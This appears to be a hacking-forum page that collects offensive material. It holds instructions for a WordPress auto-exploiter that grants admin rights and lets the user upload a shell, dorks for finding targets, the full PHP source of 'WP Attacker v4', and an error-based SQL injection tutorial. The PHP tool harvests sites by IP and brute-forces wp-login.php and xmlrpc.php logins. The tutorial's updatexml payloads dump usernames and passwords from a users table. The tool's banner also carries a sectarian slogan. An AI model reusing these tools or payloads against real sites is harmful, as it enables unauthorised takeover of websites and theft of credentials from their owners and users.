Sunt de acord cu @albertynos sa nu se poata posta in acea categorie daca nu ai posturile necesare. Multi posteaza acolo aiurea folosind scuza "stiu ca nu am destule posturi dar am zis sa postez"

Credit's to: Foksi Wordpress Auto-Exploiter is a tool that allows you to register as a new administrator on WordPress sites that have an error in the file ajax.php. (authorization file hranilesche user data) Instructions for use auto-exploiter vulnerabilities Online Wordpress: In the URL field, paste the link of the site and in the field, write the name of the theme topics, and in a field You mail prescribes ; soap; Confirm Exploit ; If the site is vulnerable, then T "Register" button will be enabled; Click on the Register and the web browser will take you to the registration page; Enter the user name and e-mail address Check your inbox for confirmation and the password of your account. If you selected a site on Wordpress is vulnerable and you have done all the above steps correctly then you have successfully registered on this site on the rights of the administrator; VirusTotal Download Tutorial

Credit's to: Foksi Wordpress Auto-Exploiter is a tool that enable you to register as new admin on a wordpress site which have the bug on the Ajax.php file. How to create dorks? It's very easy so create the dorks, the list of vulnerable themes are already provided on the right richtext box. So, you just need to add the theme name. Dork: inurl:/wp-content/themes/[theme_name] Example: inurl:/wp-content/themes/appius How to use the tools? It's easy, once you have found your target, Simply paste the site URL,theme name, an your email in the textbox Click on Confirm > Exploit If your target is vulnerable, the "Register" button will be enabled Click on Register and the webbrowser will bring you to the registration page Enter your username and email Check your email inbox for the confirmation and the password for your account. Login to the site and there you go You also can upload shell into the site.

An automation tool to scan for an Sql Injection vulnerability. SQLI Hunter is an automation tool to scan for an Sql Injection vulnerability in a website. It automates the search of sqli vulnerable links from Google using google dorks! SQLI Hunter can also find admin page of any website by using some predefined admin page lists. Fast and Easy to use ! Download

WP-ATTACKER v.4 Credit's to: Hannibal Ksa What's new ? Grab all wordpress websites on the server via Bing API Scan all the possible plugins/themes on each website from a list (provided by the user) Brute Force using the correct username and a passwords list via xmlrpc.php *NEW* Brute Force using the correct username and a passwords list via wp-login.php *MODIFIED* Scan all the possible plugins/themes on each website from security databases *MODIFIED* Change the appearance of the tool Plugins/themes List format: XP:wp-content/plugins/XP/lib/exploit.php:Group-XP XP = plugin/theme 's name wp-content/plugins/XP/lib/exploit.php = plugin/theme 's path Group-XP = Keyword (clue to double check if its there!) NOTE: Keyword value is optional in this version the Tool uses two methods to check plugins and/or themes, which are: Keyword. Headers Respond. Passwords list: 123456 password admin whateva -------------- What's new ? Brute Force using two methods: The usual way : wp-login.php The new way : xmlrpc.php Checking plugins and/or themes using two methods: Keyword (provided by the user). Headers. Any list could be used with a simple modification as an example: HERE ! Pictures for Brute Forcing (Success!): XMLRPC WP-LOGIN Before downloading you must have a BING API Hash: here Link download: HERE <?php /* ??????? ??????? ??????? ??? ?????????? ??? ?????????? ???????? ???????????????????? ??????????? ???????????????? ??? ??????????????? ?????? ??????????? ?????? ???????? ??? ?????????????? ?????? ?????????? ?????? ??????? ???????????? ???????????????????????? ???? ?????? ??????? ??? ??? ??????? ??????? ??? ??? ?????? ALM3REFH.COM ??? ?????????? ?????? ?????????????????? ?????? ?????????? ?????????????????? ??? ??????????? ????????????????????????????????????????????? ???????????????????? ??? ?? ??????????? ???????? ??? ??? ??????????? ??????? ?????? ???????? ????????????????? ???????? ??? ??? ??????????? ??????? ?????? ???????? ????????????? ??? ??? ??? ??? ??? ?????????????? ?????????????? ??? ???????? ??? ??? ??? ??? ??? ??? ??? ?????????? ?????????????? ??? FORTH VERSION WP Attacker v4 © Group XP 2014 Coder : Hannibal Ksa (@r00t3rz) Home : alm3refh.com, sec4ever.com What's WP Attacker: - Scan the server's websites, and filter the ones that are using WorePress (Using Bing search engin [API]). - Get All the possible plugins and themese, which are vulnerable (Using a list). *UPDATED* - BruteForce each website that uses Wordpress (Using a correct username and a passwords list). - BruteForce each website that uses Wordpress (via XMLRPC's file using a correct username). *NEW* - Get All the possible plugins and themes, which are vulnerable (Using security dbs). *UPDATED* - Exploit 'em (Using more than 20 new/0day exploits). *UNDERGROUND* Why WP Attacker? - Using Bing API, Which leads to faster & guaranteed responde. - User can use his own 0day exploits. - BruteForce with two methods/ways. - List can be updated by the user. - Fast, simple and easy. # In a simple word, it is an "Automatic WP Exploiter". Disclaimer: - THIS TOOL WAS WRITTEN FOR EDUCATIONAL PURPOSES. ONLY USE THIS TOOL ON WEBSITES YOU ARE ALLOWED TO TEST - THE AUTHOR CANNOT AND WILL NOT IN ANY WAY LIABLE FOR ANY LOSS OR DAMAGE ARISING WITH THE USE OF THIS TOOL. - USE IT UNDER YOUR OWN RISK! - IF YOU DON'T AGREE WITH WHAT I SAID, PLEASE DON'T USE THIS TOOL. Thanks and enjoy. And stay tuned! Best regards, Ali (aka Hannibal Ksa). */ error_reporting(0); function clear(){ ########################## ## CLEAN THE SCREEN ## #################################################### ## FIXED TO BE ABLE TO WORK ON OSX AND OTHER OS ## #################################################### if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { #strtolower(PHP_SHLIB_SUFFIX) === 'dll' @System('clear'); # Linux/UNIX/OS X } } function banner(){ ########################################################## ## BANNERS/COPYRIGHTS R00T3RZ.COM & ALM3REFH.COM ## ## REMOVING THIS WILL ONLY MAKES YOU A "DOUCHEBAG!" ## ########################################################## #################### ## FIRST BANNER ## #################### $bannerone = "\n\t _ _____ ___ _______________ _______ _________"; $bannerone .="\n\t | | /| / / _ \ / _ /_ __/_ __/ _ |/ ___/ //_/ __/ _ \\"; $bannerone .="\n\t | |/ |/ / ___/ / __ |/ / / / / __ / /__/ ,< / _// , _/"; $bannerone .="\n\t |__/|__/_/ /_/ |_/_/ /_/ /_/ |_\___/_/|_/___/_/|_| \n"; $bannerone .="\n\t\t WP Attacker v4 - By Hannibal Ksa\n\n\n"; ##################### ## SECOND BANNER ## ##################### $bannertwo = "\n\t ( "; $bannertwo .="\n\t ( ( )\ ) ( ) ) ) "; $bannertwo .="\n\t )\))( '(()/( )\ ( /(( /( ) ( /( ( ( "; $bannertwo .="\n\t((_)()\ ) /(_)) ((((_)( )\())\()| /( ( )\()) ))\ )( "; $bannertwo .="\n\t_(())\_)()(_)) )\ _ )\(_))(_))/)(_)) )\((_)\ /((_|()\ "; $bannertwo .="\n\t\ \((_)/ /| _ \ (_)_\(_) |_| |_((_)_ ((_) |(_|_)) ((_) "; $bannertwo .="\n\t \ \/\/ / | _/ / _ \ | _| _/ _` / _|| / // -_)| '_| "; $bannertwo .="\n\t \_/\_/ |_| /_/ \_\ \__|\__\__,_\__||_\_\\\\___||_| \n"; $bannertwo .="\n\t\t WP Attacker v4 - By Hannibal Ksa\n\n\n"; #################### ## THIRD BANNER ## #################### $bannerthr = "\n\t _ _ _ _____ _____ _ _ _ "; $bannerthr .="\n\t| | | | _ | | _ | |_| |_ ___ ___| |_ ___ ___ "; $bannerthr .="\n\t| | | | __| | | _| _| .'| _| '_| -_| _|"; $bannerthr .="\n\t|_____|__| |__|__|_| |_| |__,|___|_,_|___|_| \n"; $bannerthr .="\n\t\t WP Attacker v4 - By Hannibal Ksa\n\n\n"; ##################### ## FOURTH BANNER ## ##################### $bannerfor = "\n\t _ _______ ___ _ _ _ "; $bannerfor .="\n\t| | | | ___ \ / _ \| | | | | | "; $bannerfor .="\n\t| | | | |_/ / / /_\ \ |_| |_ __ _ ___| | _____ _ __ "; $bannerfor .="\n\t| |/\| | __/ | _ | __| __/ _` |/ __| |/ / _ \ '__|"; $bannerfor .="\n\t\ /\ / | | | | | |_| || (_| | (__| < __/ | "; $bannerfor .="\n\t \/ \/\_| \_| |_/\__|\__\__,_|\___|_|\_\___|_| \n"; $bannerfor .="\n\t\t WP Attacker v4 - By Hannibal Ksa\n\n\n"; #################### ## FIFTH BANNER ## #################### $bannerfiv = "\n\t??? ?????????? ?????? ?????????????????? ?????? ?????????? ?????????????????? "; $bannerfiv .="\n\t??? ??????????? ????????????????????????????????????????????? ????????????????????"; $bannerfiv .="\n\t??? ?? ??????????? ???????? ??? ??? ??????????? ??????? ?????? ????????"; $bannerfiv .="\n\t????????????????? ???????? ??? ??? ??????????? ??????? ?????? ????????"; $bannerfiv .="\n\t????????????? ??? ??? ??? ??? ??? ?????????????? ?????????????? ???"; $bannerfiv .="\n\t ???????? ??? ??? ??? ??? ??? ??? ??? ?????????? ?????????????? ???\n\n"; $bannerfiv .="\t\t\t\t WP Attacker v4 - By Hannibal Ksa\n\n\n"; ######################################### ## GET A RANDOME BANNER & PRINT IT ## ## METASPLOIT SWAG ## ######################################### $banner = array($bannerone, $bannertwo, $bannerthr, $bannerfor, $bannerfiv); print $banner[array_rand($banner)]; } function noblackhat(){ ################## ## DISCLAIMER ## ################## print "\n\t ______________________________________________"; print "\n\t| ____ __ ______ |"; print "\n\t| / ___|_ __ ___ _ _ _ __ \ \/ / _ \ |"; print "\n\t| | | _| '__/ _ \| | | | '_ \ \ /| |_) | |"; print "\n\t| | |_| | | | (_) | |_| | |_) | / \| __/ |"; print "\n\t| \____|_| \___/ \__,_| .__/ /_/\_\_| |"; print "\n\t| |_|ALM3REFH.com |"; print "\n\t| |"; print "\n\t+----------------------------------------------+"; print "\n\t| WP Attacker v4 - By Hannibal Ksa |"; print "\n\t+----------------------------------------------+\n\n"; print "\n\t\t !! NO SHIA / ONLY SUNNAH !!\n\n"; ########################### ## 5 SECONDS DISCLAIMER ## ########################### print "\n\n\tThis tool may be used for legal purposes only. Users take full \tresponsibility for any actions performed using this tool. \tWP-ATTACKER comes with ABSOLUTELY NO WARRANTY! \tIf these terms are not acceptable to you, then do not use this tool. \n\tPlease Read! Continuing in 5 seconds "; sleep(1);print ".";sleep(1);print ".";sleep(1);print ".";sleep(1);print ".";sleep(1);print ".";sleep(1);print ". "; print "\n\n\n\n"; } function bing_it($hk){ ################## ## BING API ## ########################################################################### ## REPLACE [ $account_key ] VALUE WITH YOUR [ BING API ACCOUNT KEY ] ## ## MORE INFO [ [url]https://datamarket.azure.com/dataset/bing/search[/url] ] ## ########################################################################### $account_key = 'ACCOUNT_KEY_GOES_HERE'; $query = $hk; $url = "https://api.datamarket.azure.com/Bing/Search/v1/Web?Query=".urlencode("'$query'")."&\$format=json"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FRESH_CONNECT,true); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_USERPWD, $account_key . ":" . $account_key); $json = curl_exec($ch); curl_close($ch); $data = json_decode($json); foreach ($data->d->results as $value) { $file = fopen("sites.txt","a+"); fwrite($file,"{$value->DisplayUrl}\n"); fclose($file); } } function wp($list){ ######################################## ## CHECK IF IS BUILT ON WORDPRESS ## ######################################## $file = file_get_contents($list); $get = explode('\n', $file); foreach($get as $site){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $site); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); $result = curl_exec($ch); curl_exec($ch); curl_close($ch); if(preg_match("#wp-content#", $result) or preg_match("/wp-includes/", $result)){ $filename = 'wp-sites.txt'; $fp = fopen($filename, "a+"); $write = fputs($fp, $site."\n"); fclose($fp); } } $lines = file('wp-sites.txt'); $lines = array_unique($lines); file_put_contents('wp-sites.txt', implode($lines)); } function wp_em($list){ ############################### ## MAKE'EM CRYSTAL CLEAR ## ############################### $file = file_get_contents($list); $get = explode("\n", $file); foreach($get as $wpsite){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wpsite); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); $result = curl_exec($ch); curl_exec($ch); curl_close($ch); preg_match('|<link rel="pingback" href="(.*?)" />|', $result, $url); $wpurl = str_replace("xmlrpc.php","",$url[1]); $filename = 'wp.txt'; $fp = fopen($filename, "a+"); $write = fputs($fp, $wpurl."\n"); fclose($fp); } $lines = file('wp.txt'); $lines = array_unique($lines); file_put_contents('wp.txt', implode($lines)); } function xp_scanner($target, $list, $key = NULL){ ########################################################## ## PLUGINS AND THEMESE SCANNER SECOND/PUBLIC VERSION ## ########################################################## ## LIST FORMAT: NAME:PATH:KEYWORD ## ## EXAMPLE: xp:wp-content/plugins/xp/xp.php:Group-XP ## ########################################################## ## NAME IS REQUIRED ## ## PATH IS REQUIRED ## ## KEYWORD IS OPTIONAL (?) ## ########################################################## $file = file_get_contents($list); $plugins = explode("\n", $file); #print "\n\n[ Testing $target with ".count($plugins)." Plugins/Themes ]\n"; if($key == NULL){ foreach($plugins as $plugin){ ##################### ## GET HEADERS ## ##################### $x = explode(":", $plugin); $target = $target.'/'.$x[1]; $check = @get_headers($target); if(eregi("200",$check[0])){ #################### ## PLUGIN FOUND ## #################### print "\n\t[!] FOUND $x[0] -> $target"; /* ############# ## SAVE IT ## ############# $data = $target." -> ".$x[0]."\n"; $filename = 'vuln.txt'; $fp = fopen($filename, "a+"); $write = fputs($fp, $data); fclose($fp); */ }#else { print "\n\t[-] NOT FOUND $x[0] -> $target"; } } }else{ foreach($plugins as $plugin){ ##################### ## GET KEYWORD ## ##################### $x = explode(":", $plugin); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $target.'/'.$x[1]); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); $result = curl_exec($ch); curl_exec($ch); curl_close($ch); if(preg_match("#".$x[2]."#", $result)){ #################### ## PLUGIN FOUND ## #################### print "\n\t[!] FOUND $x[0] -> $target"; /* ############# ## SAVE IT ## ############# $data = $target." -> ".$x[0]."\n"; $filename = 'vuln.txt'; $fp = fopen($filename, "a+"); $write = fputs($fp, $data); fclose($fp); */ } #else { print "\n\t[-] NOT FOUND $x[0] -> $target"; } } } } function xp_get_plugins($target){ ######################### ## GET ALL PLUGINS ## ######################### $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $target); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); $result = curl_exec($ch); curl_exec($ch); curl_close($ch); preg_match_all("#/plugins/(.*?)/#i", $result, $plugin); $plugins = array_unique($plugin[1]); #if(count($plugins)==0){ # print "No Plugin was found."; #} foreach($plugins as $found){ #print "\n\n$found\n\n"; ################# ## SEARCH IT ## ################# xp_scanner_db($target, $found); } } function xp_get_themes($target){ ######################### ## GET ALL PLUGINS ## ######################### $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $target); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); $result = curl_exec($ch); curl_exec($ch); curl_close($ch); preg_match_all("#/wp-content/themes/(.*?)/#i", $result, $theme); $themes = array_unique($theme[1]); #if(count($plugins)==0){ # print "No Plugin was found."; #} foreach($themes as $found){ #print "\n\n$found\n\n"; ################# ## SEARCH IT ## ################# xp_scanner_db($target, $found); } } function xp_scanner_db($target, $plugin){ ####################################################################### ## PLUGINS SCANNER USING ONLINE SECURITY DBS FIRST/PUBLIC VERSION ## ####################################################################### ## THIS VERSION ONLY CHECKS ## ## - WORDPRESSEXPLOIT.COM ## ## - EXPLOIT-DB.COM ## ################################ $wpexploit = array("http://www.wordpressexploit.com/", ); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wpexploit); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); $result = curl_exec($ch); curl_exec($ch); curl_close($ch); if(preg_match("#$plugin#", $result)){ ############## ## GOTCHA ## ############## //print "\n\t$target -> seems to has a vulnerability plugin which is $plugin\n"; ############### ## SAVE IT ## ############### $data = "\n[!] $target -> seems to has a vulnerability plugin which is [ $plugin ]"; $filename = 'vulpl.txt'; $fp = fopen($filename, "a+"); $write = fputs($fp, $data."\n"); fclose($fp); } } function xp_get_user($target,$list, $xmlrpc = NULL){ #################################### ## GET WORDPRESS USERNAME ## ## A SIMPLE ONE BUT WOTH A SHOT ## #################################### $user = trim(($target))."/?author=1"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $user); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); $result = curl_exec($ch); curl_exec($ch); curl_close($ch); preg_match('#<title>(.*?)</title>#', $result, $username); $account = explode('|', $username[1]); if($xmlrpc == NULL){ ########################################################### ## START BRUTE FORCE WITH THE ADMIN ACCOUNT / NORMAL BF ## ########################################################### return xp_brute($target,$account[0],$list); }else { ########################################################### ## START BRUTE FORCE VIA XMLRPC WITH THE ADMIN ACCOUNT ## ########################################################### return xp_brute_xmlrpc($target,$account[0],$list); } } function xp_brute($target,$user,$list){ ########################################### ## BRUTE FORCE PULBLIC/FIRST VERSION ## ########################################### ## PASSWORDS LIST FORMAT: PASSWORD\n ## ## EXAMPLE: 12345\np4ssw0rd ## ## ( \n = NEW LINE ) ## ########################################### $file = file_get_contents($list); $passwords = explode("\n", $file); $target = trim($target); $user = trim($user); print "\n\n[ Testing $target ($user) with (".count($passwords).") Passwords ]\n"; foreach($passwords as $password){ ############################# ## TESTING EACH PASSWORD ## ############################# $redirect = $taregt."/wp-admin/"; $curl = curl_init(); curl_setopt($curl,CURLOPT_URL, $target."/wp-login.php"); curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); curl_setopt($curl,CURLOPT_TIMEOUT,10); curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10); curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt"); curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt"); $urlencode = urlencode("Log+In&redirect_to=$redirect&testcookie=1"); curl_setopt($curl,CURLOPT_POSTFIELDS, "log=$user&pwd=$password&rememberme=forever&wp-submit=$urlencode"); $result = curl_exec($curl); curl_close($curl); ########################## ## CHECK IF IT WORKED ## ########################## if(strstr($result, 'tab-panel-overview')){ print "\n\t[!] Cracked $target -> [ $user:$password ]\n"; ############### ## SAVE IT ## ############### $data = "\n[!] Cracked $target -> [ $user:$password ]"; $filename = 'cracked.txt'; $fp = fopen($filename, "a+"); $write = fputs($fp, $data."\n"); fclose($fp); break; }#else{ print "\n[+] Trying $user:$password"; } } } function xp_check_xmlrpc($target){ $target = $target."/xmlrpc.php"; $check = @get_headers($target); if(eregi("200",$check[0])){ return 1; }else{ return 0; } } function xp_brute_xmlrpc($target,$user,$list){ ###################################################### ## BRUTE FORCE VIA XMLRPC PULBLIC/FIRST VERSION ## ###################################################### ## PASSWORDS LIST FORMAT: PASSWORD\n ## ## EXAMPLE: 12345\np4ssw0rd ## ## ( \n = NEW LINE ) ## ###################################################### $target = trim($target); $user = trim($user); if(xp_check_xmlrpc($target) != 1){ print "\n[!] Couldn't find xmlrpc.php in $target\n"; break; }else{ $file = file_get_contents($list); $passwords = explode("\n", $file); print "\n\n[ Testing $target ($user) with (".count($passwords).") Passwords ]\n"; foreach($passwords as $password){ $password = trim($password); $headers = array('Content-Type: application/x-www-form-urlencoded'); $isadmin = '<name>isAdmin</name>'; ############################# ## TESTING EACH PASSWORD ## ############################# $data = " <methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value><string>$user</string></value></param> <param><value><string>$password</string></value></param> </params></methodCall> "; $curl = curl_init(); curl_setopt($curl,CURLOPT_URL, $target."/xmlrpc.php"); curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'); curl_setopt($curl,CURLOPT_HTTPHEADER,$headers); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); curl_setopt($curl,CURLOPT_TIMEOUT,10); curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10); curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt"); curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt"); curl_setopt($curl,CURLOPT_POSTFIELDS, $data); $result = curl_exec($curl); curl_close($curl); ########################## ## CHECK IF IT WORKED ## ########################## if(strstr($result, $isadmin)){ print "\n\t[!] Cracked $target -> [ $user:$password ]\n"; ############### ## SAVE IT ## ############### $data = "\n[!] Cracked $target -> [ $user:$password ]"; $filename = 'cracked.txt'; $fp = fopen($filename, "a+"); $write = fputs($fp, $data."\n"); fclose($fp); break; }#else{ print "\n[+] Trying $user:$password"; } } } } function bye(){ ######################## ## DONE/SAY GOODBYE ## ######################## print "\n\n[+] DONE!\n[-] EXITING.\n\n"; ###################### ## DELETE LOG FILES ## ################################################################### ## NOTE: YOU CAN REMOVE THIS TO HAVE MORE INFO ABOUT THE TARGET! ## ################################################################### unlink('sites.txt'); unlink('wp-sites.txt'); unlink('wp.txt'); unlink('vuln.txt'); unlink('cracked.txt'); exit(2); } ############################ ## COMMAND LINE'S SHIT ## ############################ clear(); noblackhat(); ################################################ ## MAKE SURE IT RUNS ONLY FROM COMMAND LINE ## ################################################ if( strtolower(php_sapi_name()) != 'cli' ) { printf("%s\n", "Please run only from command line interface."); exit; } clear(); banner(); print "\nIP-Address # "; $target = trim(fgets(STDIN)); // if(!filter_var($targte, FILTER_VALIDATE_IP)){ die("\nError: Not a valid IP.\n\n"); } ############################## ## DELETE OLD LOG FILES ## ############################## unlink('sites.txt'); unlink('wp-sites.txt'); unlink('wp.txt'); unlink('vuln.txt'); unlink('cracked.txt'); unlink('vulpl.txt'); ############################# ## CREAT THE LOG FILES ## ############################# $log1 = fopen("sites.txt","w");fclose($log1); $log2 = fopen("wp-sites.txt","w");fclose($log2); $log3 = fopen("wp.txt","w");fclose($log3); $log4 = fopen("vuln.txt","w");fclose($log4); $log4 = fopen("cracked.txt","w");fclose($log4); $log5 = fopen("vulpl.txt","w");fclose($log5); ############################### ## SHIT IS GETTIN' REAL =P ## ############################### print "\nDORK [or simply leave it empty] # "; $dork = trim(fgets(STDIN)); print "\n[+] Getting the server's sites"; if($dork == ""){ ######################### ## IF DORK WAS EMPTY ## ######################### bing_it("ip:$target"); bing_it("ip:".$target." /page_id="); bing_it("ip:".$target." Wordpress"); bing_it("ip:".$target." blog"); }else{ ########################### ## USE THE USER'S DORK ## ########################### bing_it("ip:".$target." ".$dork); } #print "\n[-] Got'em";sleep(1); print "\n[+] Separating the sites"; wp('sites.txt'); #print "\n[-] We got the sites, which are using WordPress";sleep(1); wp_em('wp-sites.txt'); ################# ## Results ## ################# print "\n[+] Finished, these are the website/s that I found:\n"; $wplist = file_get_contents('wp.txt'); $get = explode("\n", $wplist); #print "[ ".count($get)." Website ]\n"; // empty lines will be counted foreach($get as $hk){ if(!$hk==""){ print "\n\t[!] $hk"; } } ########################### ## GIVE ME AN OPTION ## ########################### print "\n\n\n[1] PLUGINS/THEMES SCANNER. (FROM A LIST)\n[2] PLUGINS/THEMES SCANNER. (FROM A SECURITY DBS)\n[3] BRUTE FORCE.\n[4] EXIT/QUIT.\n\n"; print "\nWHAT WOULD YOU LIKE TO DO ? [1,2,3,4] : "; $what = trim(fgets(STDIN)); $choice = array("1","2","3","4"); $yesno = array("y","yes"); if(in_array($what, $choice)){ if($what == "1"){ print "\nNP, WHERE IS YOUR LIST FOR PLUGINS/THEMES? [ex: hk.txt] : "; $list = trim(fgets(STDIN)); if(!is_file($list)) { ####################### ## CAN'T LOAD LIST ## ####################### print "\nERROR! WHILE LOADING THE LIST FILE\n\n"; ############## ## EXIT ## ############## bye(); } ################# ## POOYAA! ## ################# print "\n[+] Scanning begun"; $file = file_get_contents($list); $plugins = explode("\n", $file); print "\n[-] [".count($plugins)."] Plugins/Themes have been loaded\n"; $targets = file_get_contents('wp.txt'); $r00t3rz = explode("\n", $targets); print "\nWant to use a keyword (or use headers respond) ? [Y/n]: "; $key = strtolower(trim(fgets(STDIN))); if(in_array($key, $yesno)){ $key = "set"; }else{ $key = NULL; } foreach($r00t3rz as $z){ if(!$z == ""){ xp_scanner($z, $list, $key); } } /* ################# ## Results ## ################# print "\n[+] Scanning finished!"; $vul = file_get_contents('vuln.txt'); $able = explode("\n", $vul); print '[ '.count($able).' Website ]\n'; foreach($able as $gxp){ if(!$gxp==""){ print "\n\t[!] $gxp"; } } */ bye(); } elseif($what == "2") { print "\nPLUGINS/THEMES SCANNER USING ONLINE SECURITY DBS\n\n"; ################# ## POOYAA! ## ################# print "\n[+] Scanning begun"; $targets = file_get_contents('wp.txt'); $r00t3rz = explode("\n", $targets); foreach($r00t3rz as $z){ if(!$z == ""){ xp_get_plugins($z); xp_get_themes($z); } } ################# ## Results ## ################# print "\n[+] Finished, these are the websites have a vulnerability plugin/s:\n"; $vulpl = file_get_contents('vulpl.txt'); $getpl = explode("\n", $vulpl); #print "[ ".count($get)." Website ]\n"; // empty lines will be counted foreach($getpl as $vul){ if(!$vul==""){ print "\n\t$vul"; } } bye(); } elseif($what == "3") { print "\nNP, WHERE IS YOUR PASSWORS LIST? [ex: hk.txt] : "; $list = trim(fgets(STDIN)); if(!is_file($list)) { ####################### ## CAN'T LOAD LIST ## ####################### print "\nERROR! WHILE LOADING THE LIST FILE\n\n"; ############## ## EXIT ## ############## bye(); } ################# ## POOYAA! ## ################# print "\nWANT TO BRUTEFORCE VIA XMLRPC ? [Y/n]: "; $xmlrpc = strtolower(trim(fgets(STDIN))); if(in_array($xmlrpc, $yesno)){ $xml = "set"; }else{ $xml = NULL; } print "\n[+] Bruting begun"; $targets = file_get_contents('wp.txt'); $xp = explode("\n", $targets); foreach($xp as $z){ if(!$z == ""){ xp_get_user($z, $list, $xml); } } bye(); } else { ###################### ## OOH KILL'EM =P ## ###################### bye(); } } ##################################### ## © ALM3REFH.COM 2014 - CHEERS! ## ##################################### ?>

Credit's to :Diku The “ExtractValue” function in MySQL runs an XPath query against a string representing XML data. The function takes input in the following form: UPDATEXML(XMLType_Instance, XPath_string,value_expression, namespace_string) If the XPath query is syntactically incorrect, we are presented with an error message: XPATH syntax error: ‘xpathqueryhere’ We use it in the same condition like other error based injections but sometimes if Extractvalue is not available or filtered by the firewall then we can use this one. When we try Union based query first step and do not get any output then we can try using Error based injection. For Example we used the below query and got no output. www.vuln-web.com/index.php?view=-35" union select 1,2,3,4,5-- As you can see the double quote over there..that means this time we are injecting into a string type query where the query is like. Now we can easily assume the internal query. Query: select path from pages where view="<our_input_here>" limit 1,1; So let us continue our injection using XPATH updateXML injection. www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(<b>OUR QUERY HERE</b>)),null)-- Getting the Current Database : www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(0x0a,(select database()))),null)-- Output : XPATH syntax error: ‘:database_name_here’ as we got the Database let us continue Big Grin Getting tables in current Database: www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)-- Output : XPATH syntax error:‘:table_name_here’ as you can see i used limit as we cannot extract long data which limits upto 32 characters. So i prefer Tongue to go one by one increasing the row to get the output. well if you want to dump the database go for any tool or manual proxy else create your own script to get the data dumped for you which I prefer to be the best option. So Now lets assume we got the following tables using the above Query: Posts Assets Banner Links Users Let us continue and try to get the columns: www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1)),null)-- Output : XPATH syntax error: ‘:column_name_here’ Let Us say we got the 3 Columns: id username password Let us Dump the data from them, but before that lets count the number of Columns. Counting the number of columns: www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(select count(username) from users)),null)-- You can use the same trick to count the tables or columns also. So now let us continue dumping the data www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(select count(username,0x3a,password) from users limit 0,1)),null)-- Output : XPATH syntax error: ‘:Output_here’

